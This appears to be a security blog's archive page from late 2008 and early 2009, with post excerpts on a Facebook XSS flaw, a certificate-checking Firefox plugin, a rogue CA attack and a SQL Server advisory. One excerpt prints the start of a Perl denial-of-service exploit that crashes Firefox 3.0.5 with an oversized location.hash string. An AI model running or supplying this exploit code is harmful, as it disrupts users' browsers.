Saturday, January 3rd, 2009
DaiMon has once more discovered a new critical cross-site scripting vulnerability which affects the Facebook "Reset Password" page. Malicious users can inject code to phish credentials and other sensitive personal information from millions of Facebook members.
We hope that this serious flaw gets fixed quickly as is usually the case with ...
Posted in Coding, Internet, Privacy, Security | 3 Comments
Friday, January 2nd, 2009
This Firefox plugin was first created back during the Debian/OpenSSL scare about 6 months ago where the key pairs that were generated from an affected machine were easily guessable. Marton Anka created this plugin to help users find these bad certificates:
On 12/31/2008, Marton updated this plugin to detect the ...
Posted in Coding, Internet, Privacy, Security | 1 Comment
Tuesday, December 30th, 2008
We have identified a vulnerability in the Internet Public Key Infrastructure (PKI) used to issue digital certificates for secure websites. As a proof of concept we executed a practical attack scenario and successfully created a rogue Certification Authority (CA) certificate trusted ...
Posted in Internet, Privacy, Security | No Comments
Tuesday, December 23rd, 2008
#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [
[email protected]/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP
$filename = $ARGV[0];
if(!defined($filename))
{
print "Usage: $0 <filename.html>\n\n";
}
$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" ...
Posted in Coding, Internet, Security | No Comments
Monday, December 22nd, 2008
Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line.
The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine ...
Posted in Coding, Internet, Networking, Privacy, Security, Software, Windows | No Comments
